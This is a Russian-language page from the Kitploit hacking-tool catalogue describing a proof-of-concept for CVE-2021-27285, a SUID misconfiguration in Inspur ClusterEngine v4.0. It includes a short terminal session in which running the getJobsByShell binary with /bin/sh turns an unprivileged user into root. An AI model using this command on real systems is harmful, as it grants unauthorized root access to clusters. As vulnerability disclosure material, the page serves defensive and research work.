Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-27285 — Эксплойт с доказательством концепции для неправильной конфигурации SUID в Inspur ClusterEngine (CVE-2021-27285), позволяющий неадминистративным пользователям повышать привилегии до root через компонент getJobsByShell. | Kitploit
Инструменты/GitHubGitHub/fjh1997/cve-2021-27285
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed TeamingЭксплуатация Бинарных Файлов
GitHubfjh1997/cve-2021-27285

CVE-2021-27285

Эксплойт с доказательством концепции для неправильной конфигурации SUID в Inspur ClusterEngine (CVE-2021-27285), позволяющий неадминистративным пользователям повышать привилегии до root через компонент getJobsByShell.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-27285

Платформа управления кластерами Inspur ClusterEngine — это программное обеспечение для управления заданиями, специально разработанное для HPC-продуктов серии Inspur TianSuo. Неправильная настройка SUID в Inspur ClusterEngine позволяет неадминистративным пользователям повышать привилегии и получать root-доступ через некоторые компоненты.

В Inspur ClusterEngine v4.0 имеется проблема неправильной настройки SUID с компонентом "/opt/tsce4/torque6/bin/getJobsByShell", что позволяет неадминистративным пользователям повышать привилегии и получать root-доступ через механизм SUID.

Процесс повышения привилегий выглядит следующим образом:

root@kitploit:~
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#

Рекомендация: обновите соответствующие компоненты.

Скачать инструмент